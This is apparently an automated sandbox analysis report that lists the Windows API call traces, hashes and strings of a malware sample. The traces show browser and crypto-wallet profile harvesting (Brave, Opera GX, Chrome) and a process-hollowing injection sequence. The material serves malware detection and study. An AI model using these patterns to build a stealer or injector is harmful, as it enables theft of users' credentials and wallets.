                                      • API ID: AddressProc$Eventlstrcpy$CloseHandleHeapOpenProcess$AllocateCreateExitNameUserlstrcatlstrlen
                                      • String ID:
                                      • API String ID: 2011554057-0
                                      • Opcode ID: 78da06d6b3c15353770fceffe6c36811e05dd3915249024c82d0ee1329cf05a2
                                      • Instruction ID: b01480e1d5a3b2a30415150ec120fccf19eedf600f73190197d21db62ab44534
                                      • Opcode Fuzzy Hash: 78da06d6b3c15353770fceffe6c36811e05dd3915249024c82d0ee1329cf05a2
                                      • Instruction Fuzzy Hash: EE213E3192010D7AEB55FBB0DD56FFEB378AF10780F104134F606A22D1EF606A298A65
                                      APIs
                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,00000030,?,0030B1A9,?,?,?,00000000), ref: 0030A035
                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,0030B1A9,00000080,00000000,00000000,00000030,?,0030B1A9,?,?,?,00000000), ref: 0030A06F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CreatePointer
                                      • String ID:
                                      • API String ID: 2024441833-0
                                      • Opcode ID: 6994ff328faf46316447ee684204941a1a717e3a3690d9847ab584b72a5c4d8b
                                      • Instruction ID: 7c01931178a678d3ab5cf0c720e203bc471502c84125acdf46ed8682b23283b0
                                      • Opcode Fuzzy Hash: 6994ff328faf46316447ee684204941a1a717e3a3690d9847ab584b72a5c4d8b
                                      • Instruction Fuzzy Hash: 904174B2505B089FE7359F29B8C0B67B7DCE754324F108A2FF199C6580D275D8948B61
                                      APIs
                                      • CoCreateInstance.COMBASE(00314770,00000000,00000001,003138C4,?), ref: 0030066D
                                      • SysAllocString.OLEAUT32(?), ref: 0030067B
                                      • _wtoi64.MSVCRT ref: 003006BA
                                      • SysFreeString.OLEAUT32(?), ref: 003006D9
                                      • SysFreeString.OLEAUT32(00000000), ref: 003006E0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String$Free$AllocCreateInstance_wtoi64
                                      • String ID:
                                      • API String ID: 1817501562-0
                                      • Opcode ID: 1f1c1f47e09e2ba4bacd17db0a02b293f3032debb3e8841e2ce655a1054812dc
                                      • Instruction ID: dffc781b1e1381e9993b8d403b06ef8a05dfcfed52c2d216aebaf34f5d5abb9d
                                      • Opcode Fuzzy Hash: 1f1c1f47e09e2ba4bacd17db0a02b293f3032debb3e8841e2ce655a1054812dc
                                      • Instruction Fuzzy Hash: 89219EB5A01249AFC705DF98CC91AEEBBB9EB8D310F108169F515EB250C7359941CBA0
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003101E9), ref: 00300228
                                      • Process32First.KERNEL32(00000000,00000128), ref: 00300238
                                      • Process32Next.KERNEL32(00000000,00000128), ref: 0030024A
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • Process32Next.KERNEL32(00000000,00000128), ref: 0030029E
                                      • CloseHandle.KERNEL32(00000000), ref: 003002A9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32lstrcpy$Next$CloseCreateFirstHandleSnapshotToolhelp32lstrcatlstrlen
                                      • String ID:
                                      • API String ID: 562399079-0
                                      • Opcode ID: 896834f72294b8427d92ada325640f07dab2b3fd2499974e823d3cb5beae56c8
                                      • Instruction ID: 0c71c400073286594bff762f180c5467cba0b5d530ed5d15bd56381d90e2aa80
                                      • Opcode Fuzzy Hash: 896834f72294b8427d92ada325640f07dab2b3fd2499974e823d3cb5beae56c8
                                      • Instruction Fuzzy Hash: 8A11E7316101186FEB56AB51DC1AFFEB37CAF89B40F000178F605E2190DF745A168FA5
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002FFD45
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 002FFD4C
                                      • RegOpenKeyExA.KERNEL32(80000002,02F357B8,00000000,00020119,?), ref: 002FFD6B
                                      • RegQueryValueExA.KERNEL32(?,02F45660,00000000,00000000,00000000,000000FF), ref: 002FFD86
                                      • RegCloseKey.ADVAPI32(?), ref: 002FFD90
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: 5e9b28a626cca69679404ca6a21ecc016a0cce4581df0893c3ac91f925504ccc
                                      • Instruction ID: c8ffe3fc21020cb50038f271381fe8640ca3f2bce262177da45d610c8d05d773
                                      • Opcode Fuzzy Hash: 5e9b28a626cca69679404ca6a21ecc016a0cce4581df0893c3ac91f925504ccc
                                      • Instruction Fuzzy Hash: 58F04F75600208BBE720ABA0EC49FBB7B7CEF59755F004158FA05D2240D7706905A7A0
                                      APIs
                                      • Sleep.KERNEL32(000003E8,?,?,?,?,?), ref: 00304345
                                      • CreateThread.KERNEL32(00000000,00000000,Function_000130F0,?,00000000,00000000), ref: 0030438D
                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00304399
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateObjectSingleSleepThreadWait
                                      • String ID:
                                      • API String ID: 4198075804-0
                                      • Opcode ID: 2c7e0674b420fb3953f61cbd32ca7f7e6b9e6607104c25088c55218224568afd
                                      • Instruction ID: ad24916b223e0b588bea58e9c92d8b4d68da329afeb0fd84bc621b6c35f2ee2b
                                      • Opcode Fuzzy Hash: 2c7e0674b420fb3953f61cbd32ca7f7e6b9e6607104c25088c55218224568afd
                                      • Instruction Fuzzy Hash: B5417F7192020C9BDB65EFA0DE66BEDB778AF14780F504138FA02662D1DF706A59CF50
                                      APIs
                                      • OpenProcess.KERNEL32(00000410,00000000,?), ref: 003010A5
                                      • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 003010C0
                                      • CloseHandle.KERNEL32(00000000), ref: 003010C7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseFileHandleModuleNameOpenProcess
                                      • String ID:
                                      • API String ID: 3183270410-0
                                      • Opcode ID: 045ab6a78770c212c1fe920a2e53bc84087bbde2528870cf1924c7d05e92126d
                                      • Instruction ID: 573189dd2e1576da2bddfac8f49e58ef6d1ebc5a1328cb08137045cb595115cc
                                      • Opcode Fuzzy Hash: 045ab6a78770c212c1fe920a2e53bc84087bbde2528870cf1924c7d05e92126d
                                      • Instruction Fuzzy Hash: B1F065726016286BE631AB589C49FEE776CDF15B50F004150FF08A7290DBB06D898BD5
                                      APIs
                                      • GetCurrentHwProfileA.ADVAPI32(?), ref: 003003EB
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CurrentProfilelstrcpy
                                      • String ID: Unknown
                                      • API String ID: 2831436455-1654365787
                                      • Opcode ID: e0d5e82633c5be133f010b34fcbd1432039f0adadc28471378ea8e8ec240f52a
                                      • Instruction ID: 6514ee30aff477cdb0eb3ec2dfe7362fe71735645ab0572e0151b25addab8573
                                      • Opcode Fuzzy Hash: e0d5e82633c5be133f010b34fcbd1432039f0adadc28471378ea8e8ec240f52a
                                      • Instruction Fuzzy Hash: A5E08622F1412C535E15BBA87D018EEB76CCB4CB91B00426AFE09D3341DA6199218BD5
                                      APIs
                                      • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00300D81
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FolderPathlstrcpy
                                      • String ID:
                                      • API String ID: 1699248803-0
                                      • Opcode ID: 46d068fa4588579770cf0f2b7216b9ecb7885d10b97474dc17bd87029cf158d5
                                      • Instruction ID: f82677ff5156e21ebcf22c1499259986ba886b6a4feadbe72b176c4770674801
                                      • Opcode Fuzzy Hash: 46d068fa4588579770cf0f2b7216b9ecb7885d10b97474dc17bd87029cf158d5
                                      • Instruction Fuzzy Hash: 00F03031A1015CABDB51DA58DC51BADB7FCDB84711F1082A6BA08E72C0DA706F168B94
                                      APIs
                                      • SHFileOperation.SHELL32(?), ref: 003013F6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileOperation
                                      • String ID:
                                      • API String ID: 3080627654-0
                                      • Opcode ID: af4d0dae126e7fd695d0fcd27973a356884fbaf16c64f1755c889e4dfd02d9af
                                      • Instruction ID: c7aff520c1ba6c35f76cfcc1e422132e7375ce260291fd99cddc4f98f912288e
                                      • Opcode Fuzzy Hash: af4d0dae126e7fd695d0fcd27973a356884fbaf16c64f1755c889e4dfd02d9af
                                      • Instruction Fuzzy Hash: 7CE0AEB4D0420CAFCB49DFA8D8006EEBBF9EF4C300F00816AE808E7340E77986408B95
                                      APIs
                                      • wsprintfA.USER32 ref: 00304FA0
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00304FB7
                                      • memset.MSVCRT ref: 00304FD0
                                      • memset.MSVCRT ref: 00304FE3
                                      • StrCmpCA.SHLWAPI(?,003101DC), ref: 0030500F
                                      • StrCmpCA.SHLWAPI(?,003101D8), ref: 00305029
                                      • wsprintfA.USER32 ref: 0030504E
                                      • StrCmpCA.SHLWAPI(?,003101E9), ref: 00305060
                                      • wsprintfA.USER32 ref: 00305088
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • wsprintfA.USER32 ref: 003050AA
                                      • memset.MSVCRT ref: 003050C1
                                      • lstrcat.KERNEL32(?,?), ref: 003050D1
                                      • strtok_s.MSVCRT ref: 003050E7
                                      • strtok_s.MSVCRT ref: 00305116
                                      • memset.MSVCRT ref: 00305130
                                      • lstrcat.KERNEL32(?,?), ref: 00305140
                                      • strtok_s.MSVCRT ref: 00305156
                                      • PathMatchSpecA.SHLWAPI(?,00000000), ref: 0030516E
                                      • DeleteFileA.KERNEL32(00000000,00000000,?,02F45090,?,?,?,003101E0,?,00000000,?,003101E9), ref: 0030520F
                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00305227
                                        • Part of subcall function 00300F90: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00300FAD
                                        • Part of subcall function 00300F90: GetFileSizeEx.KERNEL32(00000000,?), ref: 00300FBF
                                        • Part of subcall function 00300F90: CloseHandle.KERNEL32(00000000), ref: 00300FCA
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00305247
                                      • DeleteFileA.KERNEL32(00000000,00000000,?,000003E8,00000000,?,?,003101E9), ref: 00305259
                                      • strtok_s.MSVCRT ref: 00305272
                                      • FindNextFileA.KERNEL32(?,?), ref: 00305374
                                      • FindClose.KERNEL32(?), ref: 00305386
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$memsetstrtok_swsprintf$Find$CloseDeletelstrcat$CopyCreateFirstHandleMatchNextPathSizeSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrcpy
                                      • String ID: %s\%s$%s\%s\%s$%s\*.*
                                      • API String ID: 3252185717-1853381274
                                      • Opcode ID: 2b609da62d71b6d2a03acfc5dd4afb3d0684fbf59303abb9f2ec91d6a5f477d9
                                      • Instruction ID: 4c44f43a028892934a12df43de063980d12edae946495829d3a6c9ea39920807
                                      • Opcode Fuzzy Hash: 2b609da62d71b6d2a03acfc5dd4afb3d0684fbf59303abb9f2ec91d6a5f477d9
                                      • Instruction Fuzzy Hash: 94C1867291020CABDB65EBA0DC55FFE737CAF54740F044568FA09A6181EB71AA58CFA0
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • FindFirstFileA.KERNEL32(00000000,?,003101E9,003101E9,00000000,?,?,?,003134C0,003101E9), ref: 002FC35C
                                      • StrCmpCA.SHLWAPI(?,003101DC), ref: 002FC38C
                                      • StrCmpCA.SHLWAPI(?,003101D8), ref: 002FC3A6
                                        • Part of subcall function 002FF8A0: lstrlen.KERNEL32(002F5B05,00000000,?,?,002F5B05,003101E9), ref: 002FF8AB
                                        • Part of subcall function 002FF8A0: lstrcpy.KERNEL32(00000000,002F5B05), ref: 002FF8E2
                                      • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,003101E0,?,?,003101E9), ref: 002FC43F
                                      • StrCmpCA.SHLWAPI(00000000,Brave,00000000,?,003101E0,?,02F432B8,?,003101E0,?,02F432D8,00000000,?,?,?,003101E0), ref: 002FC5D6
                                      • StrCmpCA.SHLWAPI(?,Preferences), ref: 002FC5F0
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002FC6B4
                                      • DeleteFileA.KERNEL32(00000000), ref: 002FC77B
                                      • StrCmpCA.SHLWAPI(?,02F45360), ref: 002FC7AF
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 002FBF30: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002FBFD7
                                        • Part of subcall function 002FBF30: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002FC00B
                                        • Part of subcall function 002FC2E0: StrCmpCA.SHLWAPI(?,02F432D8), ref: 002FC813
                                        • Part of subcall function 002FC2E0: StrCmpCA.SHLWAPI(00000000,02F432B8), ref: 002FC82D
                                      • FindNextFileA.KERNEL32(?,?), ref: 002FCD02
                                      • FindClose.KERNEL32(?), ref: 002FCD14
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$CopyFind$lstrcatlstrlen$CloseDeleteFirstNext
                                      • String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
                                      • API String ID: 480569104-1189830961
                                      • Opcode ID: 349272cd5a08e38f8d9ad5884ef503104bf02a283aafad1d2d526b575fb6e3bc
                                      • Instruction ID: 4a3287257fd81e30cf1602d72893b9f12e80905c0263f0e9216f2316b87ce407
                                      • Opcode Fuzzy Hash: 349272cd5a08e38f8d9ad5884ef503104bf02a283aafad1d2d526b575fb6e3bc
                                      • Instruction Fuzzy Hash: 0952427192010C6BDB59FB70DD56EFEB338AF54780F404578FA0662291EF709A68CEA1
                                      APIs
                                      • wsprintfA.USER32 ref: 00305EBC
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00305ED3
                                      • StrCmpCA.SHLWAPI(?,003101DC), ref: 00305EFC
                                      • StrCmpCA.SHLWAPI(?,003101D8), ref: 00305F16
                                      • wsprintfA.USER32 ref: 00305F3B
                                      • StrCmpCA.SHLWAPI(?,003101E9), ref: 00305F4A
                                      • wsprintfA.USER32 ref: 00305F67
                                      • wsprintfA.USER32 ref: 00305F86
                                      • PathMatchSpecA.SHLWAPI(?,?), ref: 00305F97
                                      • lstrcat.KERNEL32(?,02F431A8), ref: 00305FC3
                                      • lstrcat.KERNEL32(?,003101E0), ref: 00305FD5
                                      • lstrcat.KERNEL32(?,?), ref: 00305FE3
                                      • lstrcat.KERNEL32(?,003101E0), ref: 00305FF5
                                      • lstrcat.KERNEL32(?,?), ref: 00306009
                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 003060AA
                                      • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,003101E9), ref: 00306119
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 003042A0: Sleep.KERNEL32(000003E8,?,?,?,?,?), ref: 00304345
                                        • Part of subcall function 003042A0: CreateThread.KERNEL32(00000000,00000000,Function_000130F0,?,00000000,00000000), ref: 0030438D
                                        • Part of subcall function 003042A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00304399
                                      • FindNextFileA.KERNEL32(?,?), ref: 00306160
                                      • FindClose.KERNEL32(?), ref: 00306172
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Filewsprintf$Find$CloseCopyCreateDeleteFirstMatchNextObjectPathSingleSleepSpecThreadWaitlstrcpy
                                      • String ID: %s\%s$%s\*
                                      • API String ID: 103870964-2848263008
                                      • Opcode ID: 2fb488212830d558ad53f961ae6e7c5dd7092b9c110b20f1b264c9509e12510a
                                      • Instruction ID: 838bff6991f3689bfab3447710a4916ec6861d72f5f0762a397865717a890737
                                      • Opcode Fuzzy Hash: 2fb488212830d558ad53f961ae6e7c5dd7092b9c110b20f1b264c9509e12510a
                                      • Instruction Fuzzy Hash: 4881C47191020CABDB29EBB0DD99DFEB37CAF54740F044568F506A2191EF30AA59CFA0
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00305A82
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00305A89
                                      • wsprintfA.USER32 ref: 00305AA2
                                      • FindFirstFileA.KERNEL32(?,?), ref: 00305AB9
                                      • StrCmpCA.SHLWAPI(?,003101DC), ref: 00305ADC
                                      • StrCmpCA.SHLWAPI(?,003101D8), ref: 00305AF6
                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00305BBC
                                        • Part of subcall function 00302C70: memset.MSVCRT ref: 00302C89
                                        • Part of subcall function 00302C70: memset.MSVCRT ref: 00302C9C
                                        • Part of subcall function 00302C70: lstrcat.KERNEL32(?,00000000), ref: 00302CCC
                                        • Part of subcall function 00302C70: lstrcat.KERNEL32(?,02F45420), ref: 00302CE8
                                        • Part of subcall function 00302C70: lstrcat.KERNEL32(?,?), ref: 00302CFC
                                        • Part of subcall function 00302C70: lstrcat.KERNEL32(?,02F450D8), ref: 00302D10
                                        • Part of subcall function 00302C70: StrStrA.SHLWAPI(00000000,02F45438), ref: 00302DA5
                                      • DeleteFileA.KERNEL32(00000000), ref: 00305BEE
                                      • wsprintfA.USER32 ref: 00305B18
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 00300B80: GetSystemTime.KERNEL32(?,02F46C20,003101E9,?,00000000,?,?,?,?,?,002F46E7,?,00000014), ref: 00300BA9
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 00305C0C
                                      • FindClose.KERNEL32(00000000), ref: 00305C1B
                                      • lstrcat.KERNEL32(?,02F431A8), ref: 00305C40
                                      • lstrcat.KERNEL32(?,02F45840), ref: 00305C53
                                      • lstrlen.KERNEL32(?), ref: 00305C5D
                                      • lstrlen.KERNEL32(?), ref: 00305C6B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Filelstrcpy$Findlstrlen$Heapmemsetwsprintf$AllocateCloseCopyDeleteFirstNextProcessSystemTime
                                      • String ID: %s\%s$%s\*
                                      • API String ID: 507455209-2848263008
                                      • Opcode ID: e947b068eb05328702cdf0d37c0aad278927e80cafba8dcddd6a54912cf7cc0a
                                      • Instruction ID: f82f351f11df74c046be11cf47ff46f395692178f44a14e3af067f5b7fda53f2
                                      • Opcode Fuzzy Hash: e947b068eb05328702cdf0d37c0aad278927e80cafba8dcddd6a54912cf7cc0a
                                      • Instruction Fuzzy Hash: B7618171920208ABDB15FBB0DD99EFE733CAF54740F444578F606A2191EB70AA59CF60
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003101E0,?,?,?,003101E0,?,?,00000000,?,00000000), ref: 002F12D9
                                      • StrCmpCA.SHLWAPI(?,003101DC), ref: 002F12FC
                                      • StrCmpCA.SHLWAPI(?,003101D8), ref: 002F1316
                                      • FindFirstFileA.KERNEL32(00000000,?,?,?,?,003101E0,?,?,?,003101E0,?,?,?,003101E0,?,?), ref: 002F140D
                                        • Part of subcall function 00300D50: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00300D81
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • DeleteFileA.KERNEL32(00000000), ref: 002F1668
                                      • FindNextFileA.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 002F16A4
                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,?), ref: 002F16B3
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002F15F6
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 002F6C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,?,002F1916,?), ref: 002F6C3F
                                        • Part of subcall function 002F6C20: GetFileSizeEx.KERNEL32(00000000,?,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6C55
                                        • Part of subcall function 002F6C20: LocalAlloc.KERNEL32(00000040,?,?,?,002F1916,?), ref: 002F6C70
                                        • Part of subcall function 002F6C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,002F1916,?), ref: 002F6C89
                                        • Part of subcall function 002F6C20: CloseHandle.KERNEL32(00000000,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6CB1
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 002F18F5
                                        • Part of subcall function 002F6C20: LocalFree.KERNEL32(?,?,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6CA9
                                      • DeleteFileA.KERNEL32(00000000), ref: 002F1967
                                      • FindNextFileA.KERNEL32(00000000,?), ref: 002F19A8
                                      • FindClose.KERNEL32(00000000), ref: 002F19B7
                                        • Part of subcall function 003042A0: Sleep.KERNEL32(000003E8,?,?,?,?,?), ref: 00304345
                                        • Part of subcall function 003042A0: CreateThread.KERNEL32(00000000,00000000,Function_000130F0,?,00000000,00000000), ref: 0030438D
                                        • Part of subcall function 003042A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00304399
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 00300D10: GetFileAttributesA.KERNEL32(00000000,?,?,002F1774,?,?,?,003101E9), ref: 00300D1D
                                        • Part of subcall function 00300B80: GetSystemTime.KERNEL32(?,02F46C20,003101E9,?,00000000,?,?,?,?,?,002F46E7,?,00000014), ref: 00300BA9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                      • String ID: \*.*
                                      • API String ID: 2220404975-1173974218
                                      • Opcode ID: 47fc87a0416f642c8cb18971b96e98ad066e03594a23030afaa733e76b30d0cf
                                      • Instruction ID: cce209395dd87e03840c4719b7d1c9b746985a2c68f53d7c7492db61c4798a9c
                                      • Opcode Fuzzy Hash: 47fc87a0416f642c8cb18971b96e98ad066e03594a23030afaa733e76b30d0cf
                                      • Instruction Fuzzy Hash: 7C32037193010CAADB59EBA0DD66EFDB378AF54780F404178F60666191EF70AB68CF60
                                      APIs
                                      • memset.MSVCRT ref: 002FEDB8
                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?), ref: 002FEDDC
                                      • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 002FEDF6
                                      • GetThreadContext.KERNEL32(?,00000000), ref: 002FEE0C
                                      • ReadProcessMemory.KERNEL32(?,?,00000000,00000004,00000000), ref: 002FEE2C
                                      • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 002FEE45
                                      • ResumeThread.KERNEL32(?), ref: 002FEE55
                                      • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 002FEE70
                                      • WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 002FEEB7
                                      • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 002FEEE9
                                      • SetThreadContext.KERNEL32(?,?), ref: 002FEEFF
                                      • ResumeThread.KERNEL32(?), ref: 002FEF09
